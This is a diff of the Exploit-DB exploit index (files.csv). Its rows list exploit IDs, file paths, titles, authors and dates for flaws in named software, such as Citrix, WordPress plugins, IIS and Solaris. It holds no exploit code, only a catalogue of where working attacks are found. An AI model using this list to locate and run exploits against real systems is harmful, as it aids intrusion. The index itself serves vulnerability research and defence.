18967,platforms/windows/remote/18967.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020004 Buffer Overflow",2012-06-01,metasploit,windows,remote,0 18968,platforms/windows/remote/18968.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020006 Buffer Overflow",2012-06-01,metasploit,windows,remote,0 -18969,platforms/windows/remote/18969.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020002 Buffer Overflow",2012-06-01,metasploit,windows,remote,0 +18964,platforms/windows/dos/18964.txt,"IrfanView 4.33 Format PlugIn ECW Decompression Heap Overflow",2012-06-01,"Francis Provencher",windows,dos,0 18970,platforms/php/webapps/18970.txt,"Membris 2.0.1 - Multiple Vulnerabilities",2012-06-01,Dr.abolalh,php,webapps,0 +18965,platforms/php/webapps/18965.html,"4psa voipnow professional 2.5.3 - Multiple Vulnerabilities",2012-06-01,Aboud-el,php,webapps,0 +18969,platforms/windows/remote/18969.rb,"Citrix Provisioning Services 5.6 SP1 - Streamprocess Opcode 0x40020002 Buffer Overflow",2012-06-01,metasploit,windows,remote,0 18972,platforms/windows/dos/18972.txt,"IrfanView 4.33 Format PlugIn TTF File Parsing Stack Based Overflow",2012-06-02,"Francis Provencher",windows,dos,0 18973,platforms/windows/remote/18973.rb,"GIMP script-fu Server Buffer Overflow",2012-06-02,metasploit,windows,remote,0 18974,platforms/php/webapps/18974.txt,"vanilla forum tagging plug-in enchanced 1.0.1 - Stored XSS",2012-06-02,"Henry Hoggard",php,webapps,0 -18975,platforms/php/webapps/18975.rb,"Log1 CMS writeInfo() PHP Code Injection",2012-06-03,metasploit,php,webapps,0 -18976,platforms/php/dos/18976.php,"PHP 5.3.10 spl_autoload() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0 -18977,platforms/php/dos/18977.php,"PHP 5.3.10 spl_autoload_register() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0 -18978,platforms/php/dos/18978.php,"PHP 5.3.10 spl_autoload_call() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0 -18979,platforms/php/webapps/18979.txt,"vanilla forums poll plugin 0.9 - Stored XSS",2012-06-03,"Henry Hoggard",php,webapps,0 -18980,platforms/php/webapps/18980.txt,"Vanilla Forums 2.0.18.4 Tagging Stored XSS",2012-06-03,"Henry Hoggard",php,webapps,0 -18981,platforms/windows/local/18981.txt,"Sysax <= 5.60 Create SSL Certificate Buffer Overflow",2012-06-04,"Craig Freyman",windows,local,0 -18982,platforms/windows/webapps/18982.txt,"Hexamail Server <= 4.4.5 Persistent XSS Vulnerability",2012-06-04,modpr0be,windows,webapps,0 -18983,platforms/php/webapps/18983.php,"Mnews <= 1.1 (view.php) SQL Injection",2012-06-04,WhiteCollarGroup,php,webapps,0 -18984,platforms/multiple/remote/18984.rb,"Apache Struts <= 2.2.1.1 - Remote Command Execution",2012-06-05,metasploit,multiple,remote,0 -18985,platforms/php/webapps/18985.txt,"pyrocms 2.1.1 - Multiple Vulnerabilities",2012-06-05,LiquidWorm,php,webapps,0 18986,platforms/windows/remote/18986.rb,"Sielco Sistemi Winlog <= 2.07.16 - Buffer Overflow",2012-06-05,m-1-k-3,windows,remote,0 18987,platforms/php/webapps/18987.php,"Wordpress WP-Property Plugin 1.35.0 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 18988,platforms/php/webapps/18988.php,"Wordpress Plugin Marketplace Plugin 1.5.0 - 1.6.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 18989,platforms/php/webapps/18989.php,"Wordpress Google Maps via Store Locator Plugin 2.7.1 - 3.0.1 - Multiple Vulnerabilities",2012-06-05,"Sammy FORGIT",php,webapps,0 18990,platforms/php/webapps/18990.php,"Wordpress HTML5 AV Manager Plugin 0.2.7 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 18991,platforms/php/webapps/18991.php,"Wordpress Foxypress Plugin 0.4.1.1 - 0.4.2.1 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 +19027,platforms/windows/remote/19027.rb,"Samsung NET-i viewer Multiple ActiveX BackupToAvi() Remote Overflow",2012-06-08,metasploit,windows,remote,0 18993,platforms/php/webapps/18993.php,"Wordpress Asset Manager Plugin 0.2 - Arbitrary File Upload",2012-06-05,"Sammy FORGIT",php,webapps,0 18994,platforms/php/webapps/18994.php,"Wordpress Font Uploader Plugin 1.2.4 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 +19026,platforms/windows/remote/19026.rb,"Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow",2012-06-08,metasploit,windows,remote,0 18997,platforms/php/webapps/18997.php,"Wordpress MM Forms Community Plugin 2.2.6 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 18998,platforms/php/webapps/18998.php,"Wordpress Gallery Plugin 3.06 - Arbitrary File Upload",2012-06-06,"Sammy FORGIT",php,webapps,0 18999,platforms/php/webapps/18999.php,"SN News (visualiza.php) <= 1.2 - SQL Injection",2012-06-06,WhiteCollarGroup,php,webapps,0 19000,platforms/windows/dos/19000.py,"Audio Editor Master 5.4.1.217 - Denial of Service Vulnerability",2012-06-06,Onying,windows,dos,0 -19002,platforms/windows/remote/19002.rb,"Microsoft Windows OLE Object File Handling Remote Code Execution",2012-06-06,metasploit,windows,remote,0 -19003,platforms/php/webapps/19003.txt,"vanilla kpoll plugin 1.2 - Stored XSS",2012-06-06,"Henry Hoggard",php,webapps,0 +19012,platforms/php/webapps/19012.txt,"Wordpress Front File Manager Plugin 0.1 - Arbitrary File Upload",2012-06-08,"Adrien Thierry",php,webapps,0 +19013,platforms/php/webapps/19013.txt,"Wordpress Easy Contact Forms Export Plugin 1.1.0 Information Disclosure Vulnerability",2012-06-08,"Sammy FORGIT",php,webapps,0 19005,platforms/php/webapps/19005.txt,"SN News <= 1.2 (/admin/loger.php) Admin Bypass SQL Injection",2012-06-07,"Yakir Wizman",php,webapps,0 19006,platforms/windows/local/19006.py,"Lattice Semiconductor PAC-Designer 6.21 - (.PAC) Exploit",2012-06-07,b33f,windows,local,0 +19002,platforms/windows/remote/19002.rb,"Microsoft Windows OLE Object File Handling Remote Code Execution",2012-06-06,metasploit,windows,remote,0 +19003,platforms/php/webapps/19003.txt,"vanilla kpoll plugin 1.2 - Stored XSS",2012-06-06,"Henry Hoggard",php,webapps,0 +19030,platforms/windows/remote/19030.rb,"Tom Sawyer Software GET Extension Factory Remote Code Execution",2012-06-10,metasploit,windows,remote,0 19007,platforms/php/webapps/19007.php,"PHPNet <= 1.8 (ler.php) SQL Injection",2012-06-07,WhiteCollarGroup,php,webapps,0 19008,platforms/php/webapps/19008.php,"Wordpress Front End Upload 0.5.3 - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0 19009,platforms/php/webapps/19009.php,"Wordpress Omni Secure Files Plugin 0.1.13 - Arbitrary File Upload",2012-06-07,"Adrien Thierry",php,webapps,0 -19011,platforms/php/webapps/19011.txt,"Webspell FIRSTBORN Movie-Addon Blind SQL Injection Vulnerability",2012-06-08,"Easy Laster",php,webapps,0 -19012,platforms/php/webapps/19012.txt,"Wordpress Front File Manager Plugin 0.1 - Arbitrary File Upload",2012-06-08,"Adrien Thierry",php,webapps,0 -19013,platforms/php/webapps/19013.txt,"Wordpress Easy Contact Forms Export Plugin 1.1.0 Information Disclosure Vulnerability",2012-06-08,"Sammy FORGIT",php,webapps,0 19016,platforms/php/webapps/19016.txt,"Wordpress PICA Photo Gallery Plugin 1.0 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 +19029,platforms/php/webapps/19029.py,"phpAcounts 0.5.3 - SQL Injection",2012-06-08,loneferret,php,webapps,0 19018,platforms/php/webapps/19018.txt,"Wordpress Plugin: Newsletter 1.5 - Remote File Disclosure Vulnerability",2012-06-08,"Sammy FORGIT",php,webapps,0 19019,platforms/php/webapps/19019.php,"Wordpress RBX Gallery Plugin 2.1 - Arbitrary File Upload",2012-06-08,"Sammy FORGIT",php,webapps,0 19020,platforms/php/webapps/19020.txt,"Wordpress Simple Download Button Shortcode Plugin 1.0 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 19021,platforms/php/webapps/19021.txt,"Wordpress Thinkun Remind Plugin 1.1.3 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 19022,platforms/php/webapps/19022.txt,"Wordpress Tinymce Thumbnail Gallery Plugin 1.0.7 - Remote File Disclosure",2012-06-08,"Sammy FORGIT",php,webapps,0 19023,platforms/php/webapps/19023.php,"Wordpress wpStoreCart Plugin 2.5.27-2.5.29 - Arbitrary File Upload",2012-06-08,"Sammy FORGIT",php,webapps,0 -19024,platforms/windows/dos/19024.pl,"ComSndFTP Server 1.3.7 Beta Remote Format String Overflow",2012-06-08,demonalex,windows,dos,0 -19025,platforms/windows/remote/19025.rb,"Sielco Sistemi Winlog Buffer Overflow 2.07.14",2012-06-08,metasploit,windows,remote,0 -19026,platforms/windows/remote/19026.rb,"Microsoft IIS MDAC msadcs.dll RDS DataStub Content-Type Overflow",2012-06-08,metasploit,windows,remote,0 -19027,platforms/windows/remote/19027.rb,"Samsung NET-i viewer Multiple ActiveX BackupToAvi() Remote Overflow",2012-06-08,metasploit,windows,remote,0 +19011,platforms/php/webapps/19011.txt,"Webspell FIRSTBORN Movie-Addon Blind SQL Injection Vulnerability",2012-06-08,"Easy Laster",php,webapps,0 19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 DEBUG Vulnerability",1988-08-01,anonymous,linux,remote,0 -19029,platforms/php/webapps/19029.py,"phpAcounts 0.5.3 - SQL Injection",2012-06-08,loneferret,php,webapps,0 -19030,platforms/windows/remote/19030.rb,"Tom Sawyer Software GET Extension Factory Remote Code Execution",2012-06-10,metasploit,windows,remote,0 19031,platforms/php/webapps/19031.txt,"Webspell dailyinput Movie Addon 4.2.x SQL Injection Vulnerability",2012-06-10,"Easy Laster",php,webapps,0 19033,platforms/windows/remote/19033.txt,"Microsoft iis 6.0 and 7.5 - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0 19034,platforms/windows/dos/19034.cpp,"PEamp (.mp3) Memory Corruption PoC",2012-06-10,Ayrbyte,windows,dos,0 @@ -16434,10 +16464,10 @@ id,file,description,date,author,platform,type,port 19058,platforms/php/webapps/19058.txt,"Wordpress Custom Content Type Manager 0.9.5.13-pl Arbitrary File Upload Vulnerability",2012-06-11,"Adrien Thierry",php,webapps,0 19059,platforms/php/webapps/19059.php,"Agora-Project 2.12.11 - Arbitrary File Upload Vulnerability",2012-06-11,Misa3l,php,webapps,0 19060,platforms/php/webapps/19060.php,"TheBlog <= 2.0 - Multiple Vulnerabilities",2012-06-11,WhiteCollarGroup,php,webapps,0 +19066,platforms/irix/local/19066.txt,"SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager NETLS_LICENSE_FILE Vulnerability",1996-04-05,"Arthur Hagen",irix,local,0 +19067,platforms/irix/local/19067.txt,"SGI IRIX <= 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager LICENSEMGR_FILE_ROOT Vulnerability",1996-11-22,"Yuri Volobuev",irix,local,0 19064,platforms/hardware/dos/19064.txt,"F5 BIG-IP Remote Root Authentication Bypass Vulnerability",2012-06-11,"Florent Daigniere",hardware,dos,0 19065,platforms/php/webapps/19065.rb,"Symantec Web Gateway 5.0.2.8 ipchange.php Command Injection",2012-06-12,metasploit,php,webapps,0 -19066,platforms/irix/local/19066.txt,"SGI IRIX 5.3/6.2,SGI license_oeo 1.0 LicenseManager NETLS_LICENSE_FILE Vulnerability",1996-04-05,"Arthur Hagen",irix,local,0 -19067,platforms/irix/local/19067.txt,"SGI IRIX <= 6.4,SGI license_oeo 3.0/3.1/3.1.1 LicenseManager LICENSEMGR_FILE_ROOT Vulnerability",1996-11-22,"Yuri Volobuev",irix,local,0 19068,platforms/unix/local/19068.txt,"Digital UNIX 4.0/4.0 B/4.0 D SUID/SGID Core File Vulnerability",1998-04-06,"ru5ty and SoReN",unix,local,0 19069,platforms/linux/remote/19069.txt,"Qualcomm Eudora Internet Mail Server 1.2 - Buffer Overflow Vulnerability",1998-04-14,"Netstat Webmaster",linux,remote,0 19070,platforms/linux/local/19070.txt,"Slackware Linux 3.4 - liloconfig-color temporary file Vulnerability",1998-04-06,neonhaze,linux,local,0 @@ -16449,40 +16479,43 @@ id,file,description,date,author,platform,type,port 19076,platforms/linux/remote/19076.txt,"Apple Personal Web Sharing 1.1 Vulnerability",1998-04-10,"Netstat Webmaster",linux,remote,0 19077,platforms/linux/local/19077.c,"Fred N. van Kempen dip 3.3.7 - Buffer Overflow Vulnerability (1)",1998-05-05,jamez,linux,local,0 19078,platforms/linux/local/19078.c,"Fred N. van Kempen dip 3.3.7 - Buffer Overflow Vulnerability (2)",1998-05-05,pr10n,linux,local,0 -19079,platforms/linux/remote/19079.c,"id Software Solaris Quake II 3.13/3.14,QuakeWorld 2.0/2.1,Quake 1.9/3.13/3.14",1998-05-01,"Mark Zielinski",linux,remote,0 +19079,platforms/linux/remote/19079.c,"id Software Solaris Quake II 3.13/3.14 & QuakeWorld 2.0/2.1_Quake 1.9/3.13/3.14",1998-05-01,"Mark Zielinski",linux,remote,0 19080,platforms/linux/dos/19080.txt,"Debian suidmanager 0.18 Vulnerability",1998-04-28,"Thomas Roessler",linux,dos,0 19081,platforms/multiple/remote/19081.txt,"Lynx 2.8 - Buffer Overflow Vulnerability",1998-05-03,"Michal Zalewski",multiple,remote,0 19082,platforms/linux/dos/19082.txt,"AMD K6 Processor Vulnerability",1998-06-01,Poulot-Cazajous,linux,dos,0 19083,platforms/windows/remote/19083.cpp,"Cheyenne Inoculan for Windows NT 4.0 Share Vulnerability",1998-06-10,"Paul Boyer",windows,remote,0 -19084,platforms/multiple/remote/19084.txt,"Metainfo Sendmail 2.0/2.5,MetaIP 3.1",1998-06-30,"Jeff Forristal",multiple,remote,0 +19084,platforms/multiple/remote/19084.txt,"Metainfo Sendmail 2.0/2.5 & MetaIP 3.1",1998-06-30,"Jeff Forristal",multiple,remote,0 19085,platforms/linux/dos/19085.c,"Linux kernel 2.0/2.1 SIGIO Vulnerability",1998-06-30,"David Luyer",linux,dos,0 -19086,platforms/linux/remote/19086.c,"wu-ftpd 2.4.2,SCO Open Server <= 5.0.5,ProFTPD 1.2 pre1 realpath Vulnerability (1)",1999-02-09,"smiler and cossack",linux,remote,21 -19087,platforms/linux/remote/19087.c,"wu-ftpd 2.4.2,SCO Open Server <= 5.0.5,ProFTPD 1.2 pre1 realpath Vulnerability (2)",1999-02-09,"jamez and c0nd0r",linux,remote,21 +19086,platforms/linux/remote/19086.c,"wu-ftpd 2.4.2 & SCO Open Server <= 5.0.5 & ProFTPD 1.2 pre1 - realpath Vulnerability (1)",1999-02-09,"smiler and cossack",linux,remote,21 +19087,platforms/linux/remote/19087.c,"wu-ftpd 2.4.2 & SCO Open Server <= 5.0.5 & ProFTPD 1.2 pre1 - realpath Vulnerability (2)",1999-02-09,"jamez and c0nd0r",linux,remote,21 19089,platforms/windows/dos/19089.txt,"Windows OpenType Font - File Format DoS Exploit",2012-06-12,Cr4sh,windows,dos,0 19091,platforms/hardware/remote/19091.py,"F5 BIG-IP Remote Root Authentication Bypass Vulnerability",2012-06-12,"David Kennedy (ReL1K)",hardware,remote,0 19092,platforms/multiple/remote/19092.py,"MySQL Remote Root Authentication Bypass",2012-06-12,"David Kennedy (ReL1K)",multiple,remote,0 -19093,platforms/multiple/remote/19093.txt,"Allaire ColdFusion Server <= 4.0 - Remote File Display, Deletion, Upload and Execution Vulnerability",1998-12-25,rain.forest.puppy,multiple,remote,0 +19093,platforms/multiple/remote/19093.txt,"Allaire ColdFusion Server <= 4.0 - Remote File Display / Deletion / Upload / Execution Vulnerability",1998-12-25,rain.forest.puppy,multiple,remote,0 19094,platforms/windows/remote/19094.txt,"Internet Explorer 4.0/5.0 DHTML Edit ActiveX Control File Stealing and Cross Frame Access Vulnerability",1999-04-22,"Georgi Guninsky",windows,remote,0 19095,platforms/linux/local/19095.txt,"GNU GNU bash 1.14 Path Embedded Code Execution Vulnerability",1999-04-20,Shadow,linux,local,0 -19096,platforms/linux/remote/19096.c,"RedHat Linux <= 5.1,Caldera OpenLinux Standard 1.2 Mountd Vulnerability",1998-08-28,LucySoft,linux,remote,0 +19096,platforms/linux/remote/19096.c,"RedHat Linux <= 5.1 & Caldera OpenLinux Standard 1.2 - Mountd Vulnerability",1998-08-28,LucySoft,linux,remote,0 +19154,platforms/php/webapps/19154.py,"qdPM 7 - Arbitrary File upload",2012-06-14,loneferret,php,webapps,0 19098,platforms/multiple/dos/19098.txt,"Apple iTunes 10.6.1.7 M3U Playlist File Walking Heap Buffer Overflow",2012-06-13,LiquidWorm,multiple,dos,0 -19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP SSH Private Key Exposure",2012-06-13,metasploit,hardware,remote,0 +19099,platforms/hardware/remote/19099.rb,"F5 BIG-IP - SSH Private Key Exposure",2012-06-13,metasploit,hardware,remote,0 19100,platforms/php/webapps/19100.rb,"WordPress plugin Foxypress uploadify.php Arbitrary Code Execution",2012-06-13,metasploit,php,webapps,0 -19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3,TriTeal TED CDE 4.3,Sun Solaris <= 2.5.1 ToolTalk RPC Service Overflow Vulnerability (1)",1998-08-31,"NAI research team",unix,remote,0 -19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3,TriTeal TED CDE 4.3,Sun Solaris <= 2.5.1 ToolTalk RPC Service Overflow Vulnerability (2)",1998-08-31,"NAI research team",unix,remote,0 -19103,platforms/linux/remote/19103.c,"HP HP-UX <= 10.34,ms Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3",1997-11-13,"G P R",linux,remote,0 -19104,platforms/linux/remote/19104.c,"IBM AIX 3.2/4.1,SCO Unixware <= 7.1.1,SGI IRIX <= 5.3,Sun Solaris <= 2.5.1",1997-11-24,anonymous,linux,remote,0 +19101,platforms/unix/remote/19101.c,"Xi Graphics Maximum CDE 1.2.3 & TriTeal TED CDE 4.3 & Sun Solaris <= 2.5.1 - ToolTalk RPC Service Overflow Vulnerability (1)",1998-08-31,"NAI research team",unix,remote,0 +19102,platforms/unix/remote/19102.c,"Xi Graphics Maximum CDE 1.2.3 & TriTeal TED CDE 4.3 & Sun Solaris <= 2.5.1 - ToolTalk RPC Service Overflow Vulnerability (2)",1998-08-31,"NAI research team",unix,remote,0 +19103,platforms/linux/remote/19103.c,"HP HP-UX <= 10.34_ms Windows 95/NT 3.5.1 SP1/NT 3.5.1 SP2/NT 3.5.1 SP3/NT 3.5.1 SP4/NT 4.0/NT 4.0 SP1/NT 4.0 SP2/NT 4.0 SP3",1997-11-13,"G P R",linux,remote,0 +19104,platforms/linux/remote/19104.c,"IBM AIX 3.2/4.1 & SCO Unixware <= 7.1.1 & SGI IRIX <= 5.3 & Sun Solaris <= 2.5.1",1997-11-24,anonymous,linux,remote,0 19105,platforms/linux/remote/19105.c,"Muhammad A. Muquit wwwcount 2.3 Count.cgi Buffer Overflow Vulnerability",1997-10-16,"Razvan Dragomirescu",linux,remote,0 -19106,platforms/linux/local/19106.c,"BSDI BSD/OS <= 2.1,FreeBSD <= 2.1,IBM AIX <= 4.2,SGI IRIX <= 6.4,Sun SunOS <= 4.1.3",1996-07-03,"Jeff Uphoff",linux,local,0 -19107,platforms/linux/remote/19107.c,"Netscape Messaging Server 3.55,University of Washington imapd 10.234 - Buffer Overflow Vulnerability",1998-07-17,anonymous,linux,remote,0 -19108,platforms/unix/local/19108.txt,"HP HP-UX 10.20/11.0,IBM AIX <= 4.3,SCO Unixware 7.0,Sun Solaris <= 2.6",1999-11-03,Mastoras,unix,local,0 +19106,platforms/linux/local/19106.c,"BSDI BSD/OS <= 2.1 & FreeBSD <= 2.1_IBM AIX <= 4.2_SGI IRIX <= 6.4 & Sun SunOS <= 4.1.3",1996-07-03,"Jeff Uphoff",linux,local,0 +19107,platforms/linux/remote/19107.c,"Netscape Messaging Server 3.55 & University of Washington imapd 10.234 - Buffer Overflow Vulnerability",1998-07-17,anonymous,linux,remote,0 +19108,platforms/unix/local/19108.txt,"HP HP-UX 10.20/11.0_IBM AIX <= 4.3 & SCO Unixware 7.0 & Sun Solaris <= 2.6",1999-11-03,Mastoras,unix,local,0 19109,platforms/linux/remote/19109.c,"Qualcomm qpopper 2.4 POP Server Buffer Overflow Vulnerability (1)",1998-06-27,"Seth McGann",linux,remote,0 19110,platforms/unix/remote/19110.c,"Qualcomm qpopper 2.4 POP Server Buffer Overflow Vulnerability (2)",1998-06-27,"Miroslaw Grzybek",unix,remote,0 -19111,platforms/linux/remote/19111.c,"BSDI BSD/OS <= 2.1,Caldera OpenLinux Standard 1.0,Data General DG/UX <= 5.4 4.11,IBM AIX <= 4.3,ISC BIND <= 8.1.1,NetBSD <= 1.3.1,RedHat Linux <= 5.0,SCO Open Desktop 3.0/Server 5.0,Unixware 2.1/7.0,SGI IRIX <= 6.3,Solaris <= 2.5.1 BIND Buffer overflow(1)",1998-04-08,ROTShB,linux,remote,0 -19112,platforms/linux/remote/19112.c,"BSDI BSD/OS <= 2.1,Caldera OpenLinux Standard 1.0,Data General DG/UX <= 5.4 4.11,IBM AIX <= 4.3,ISC BIND <= 8.1.1,NetBSD <= 1.3.1,RedHat Linux <= 5.0,SCO Open Desktop 3.0/Server 5.0,Unixware 2.1/7.0,SGI IRIX <= 6.3,Solaris <= 2.5.1 BIND Buffer overflow(2)",1998-04-08,prym,linux,remote,0 +19111,platforms/linux/remote/19111.c,"Multiple OSes - BIND Buffer Overflow (1)",1998-04-08,ROTShB,linux,remote,0 +19112,platforms/linux/remote/19112.c,"Multiple OSes - BIND Buffer Overflow (2)",1998-04-08,prym,linux,remote,0 19113,platforms/windows/remote/19113.txt,"Microsoft Windows NT 3.5.1 SP2/3.5.1 SP3/3.5.1 SP4/3.5.1 SP5/4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 Telnetd Vulnerability",1999-01-02,"Tomas Halgas",windows,remote,23 -19117,platforms/linux/remote/19117.c,"Digital UNIX <= 4.0 D,FreeBSD <= 2.2.4,HP HP-UX 10.20/11.0,IBM AIX <= 3.2.5,Linux kernel 2.0/2.1,NetBSD 1.2,Solaris <= 2.5.1 Smurf Denial of Service Vulnerability",1998-01-05,"T. Freak",linux,remote,0 -19118,platforms/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0,Microsoft Personal Web Server 2.0/3.0/4.0 ASP Alternate Data Streams Vulnerability",1998-01-01,"Paul Ashton",multiple,remote,0 +19386,platforms/php/webapps/19386.txt,"UCCASS <= 1.8.1 - Blind SQL Injection Vulnerability",2012-06-24,dun,php,webapps,0 +19385,platforms/windows/dos/19385.txt,"IrfanView 4.33 DJVU Image Processing Heap Overflow",2012-06-24,"Francis Provencher",windows,dos,0 +19117,platforms/linux/remote/19117.c,"Digital UNIX <= 4.0 D_FreeBSD <= 2.2.4_HP HP-UX 10.20/11.0_IBM AIX <= 3.2.5_Linux kernel 2.0/2.1_NetBSD 1.2_Solaris <= 2.5.1 Smurf Denial of Service Vulnerability",1998-01-05,"T. Freak",linux,remote,0 +19118,platforms/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0_Microsoft Personal Web Server 2.0/3.0/4.0 ASP Alternate Data Streams Vulnerability",1998-01-01,"Paul Ashton",multiple,remote,0 19119,platforms/linux/remote/19119.c,"HP HP-UX <= 10.34 rlpdaemon Vulnerability",1998-07-06,"RSI Advise",linux,remote,0 19120,platforms/multiple/remote/19120.txt,"Ralf S. Engelschall ePerl 2.2.12 Handling of ISINDEX Query Vulnerability",1998-07-06,"Luz Pinto",multiple,remote,0 19121,platforms/multiple/remote/19121.txt,"Ray Chan WWW Authorization Gateway 0.1 Vulnerability",1998-07-08,"Albert Nubdy",multiple,remote,0 @@ -16493,7 +16526,7 @@ id,file,description,date,author,platform,type,port 19126,platforms/solaris/local/19126.txt,"Sun Solaris <= 2.6 power management Vulnerability",1998-07-16,"Ralf Lehmann",solaris,local,0 19127,platforms/multiple/remote/19127.txt,"Verity Search97 2.1 Security Vulnerability",1998-07-14,"Stefan Arentz",multiple,remote,0 19128,platforms/solaris/local/19128.c,"Sun Solaris <= 7.0 sdtcm_convert Vulnerability",1998-10-23,UNYUN,solaris,local,0 -19129,platforms/multiple/remote/19129.txt,"Microsoft IIS 4.0,Microsoft Site Server 3.0 Showcode ASP Vulnerability",1999-05-07,L0pht,multiple,remote,0 +19129,platforms/multiple/remote/19129.txt,"Microsoft IIS 4.0_Microsoft Site Server 3.0 Showcode ASP Vulnerability",1999-05-07,L0pht,multiple,remote,0 19130,platforms/freebsd/local/19130.c,"FreeBSD <= 3.0 UNIX-domain panic Vulnerability",1999-05-05,"Lukasz Luzar",freebsd,local,0 19131,platforms/windows/remote/19131.py,"XM Easy Personal FTP Server <= 5.30 - Remote Format String Write4 Exploit",2012-06-14,mr_me,windows,remote,0 19132,platforms/php/webapps/19132.txt,"myre real estate mobile 2012 - Multiple Vulnerabilities",2012-06-14,Vulnerability-Lab,php,webapps,0 @@ -16512,18 +16545,22 @@ id,file,description,date,author,platform,type,port 19147,platforms/windows/remote/19147.txt,"NT IIS4 - Remote Web-Based Administration Vulnerability",1999-01-14,Mnemonix,windows,remote,0 19149,platforms/windows/remote/19149.c,"NT IIS4 Log Avoidance Vulnerability",1999-01-22,Mnemonix,windows,remote,0 19152,platforms/windows/remote/19152.txt,"Microsoft IIS 5.0 IISAPI Extension Enumerate Root Web Server Directory Vulnerability",1999-01-26,Mnemonix,windows,remote,0 -19154,platforms/php/webapps/19154.py,"qdPM 7 - Arbitrary File upload",2012-06-14,loneferret,php,webapps,0 +19387,platforms/windows/remote/19387.rb,"Apple iTunes 10 Extended M3U Stack Buffer Overflow",2012-06-25,metasploit,windows,remote,0 19156,platforms/windows/remote/19156.txt,"Microsoft Internet Explorer 5.0.1 Invalid Byte Cross-Frame Access Vulnerability",1999-01-28,"Georgi Guninski",windows,remote,0 +19413,platforms/windows/dos/19413.c,"Windows 95/98_Windows NT Enterprise Server <= 4.0 SP5_Windows NT Terminal Server <= 4.0 SP4_Windows NT Workstation <= 4.0 SP5 (1)",1999-07-03,Coolio,windows,dos,0 +19391,platforms/windows/dos/19391.py,"Slimpdf Reader 1.0 Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 +19392,platforms/windows/dos/19392.py,"Able2Extract and Able2Extract Server 6.0 - Memory Corruption",2012-06-25,"Carlos Mario Penagos Hollmann",windows,dos,0 19158,platforms/solaris/local/19158.c,"Sun Solaris <= 2.5.1 PAM & unix_scheme Vulnerability",1997-02-25,"Cristian Schipor",solaris,local,0 19159,platforms/solaris/local/19159.c,"Solaris <= 2.5.1 ffbconfig Vulnerability",1997-02-10,"Cristian Schipor",solaris,local,0 19160,platforms/solaris/local/19160.c,"Solaris <= 2.5.1 chkey Vulnerability",1997-05-19,"Adam Morrison",solaris,local,0 19161,platforms/solaris/local/19161.txt,"Solaris <= 2.5.1 Ping Vulnerability",1997-06-15,"Adam Caldwell",solaris,local,0 +19402,platforms/hardware/remote/19402.txt,"Root Exploit Western Digital's WD TV Live SMP/Hub",2012-06-26,"Wolfgang Borst",hardware,remote,0 19163,platforms/irix/local/19163.sh,"SGI IRIX 6.4 ioconfig Vulnerability",1998-07-20,Loneguard,irix,local,0 19164,platforms/windows/remote/19164.txt,"Microsoft IE4 Clipboard Paste Vulnerability",1999-01-21,"Juan Carlos Garcia Cuartango",windows,remote,0 -19167,platforms/windows/local/19167.txt,"Ipswitch IMail 5.0,WS_FTP Server 1.0.1/1.0.2 Server Privilege Escalation Vulnerability",1999-02-04,Marc,windows,local,0 -19168,platforms/unix/local/19168.sh,"SGI IRIX <= 6.5.4,Solaris <= 2.5.1 ps(1) Buffer Overflow Vulnerability",1997-04-28,"Joe Zbiciak",unix,local,0 -19172,platforms/unix/local/19172.c,"BSD/OS 2.1,DG/UX <= 7.0,Debian Linux <= 1.3,HP-UX <= 10.34,IBM AIX <= 4.2,SGI IRIX <= 6.4,Solaris <= 2.5.1 xlock Vulnerability (1)",1997-04-26,cesaro,unix,local,0 -19173,platforms/unix/local/19173.c,"BSD/OS 2.1,DG/UX <= 7.0,Debian Linux <= 1.3,HP-UX <= 10.34,IBM AIX <= 4.2,SGI IRIX <= 6.4,Solaris <= 2.5.1 xlock Vulnerability (2)",1997-04-26,BeastMaster,unix,local,0 +19167,platforms/windows/local/19167.txt,"Ipswitch IMail 5.0_WS_FTP Server 1.0.1/1.0.2 Server Privilege Escalation Vulnerability",1999-02-04,Marc,windows,local,0 +19168,platforms/unix/local/19168.sh,"SGI IRIX <= 6.5.4_Solaris <= 2.5.1 ps(1) Buffer Overflow Vulnerability",1997-04-28,"Joe Zbiciak",unix,local,0 +19172,platforms/unix/local/19172.c,"BSD/OS 2.1_DG/UX <= 7.0_Debian Linux <= 1.3_HP-UX <= 10.34_IBM AIX <= 4.2_SGI IRIX <= 6.4_Solaris <= 2.5.1 xlock Vulnerability (1)",1997-04-26,cesaro,unix,local,0 +19173,platforms/unix/local/19173.c,"BSD/OS 2.1_DG/UX <= 7.0_Debian Linux <= 1.3_HP-UX <= 10.34_IBM AIX <= 4.2_SGI IRIX <= 6.4_Solaris <= 2.5.1 xlock Vulnerability 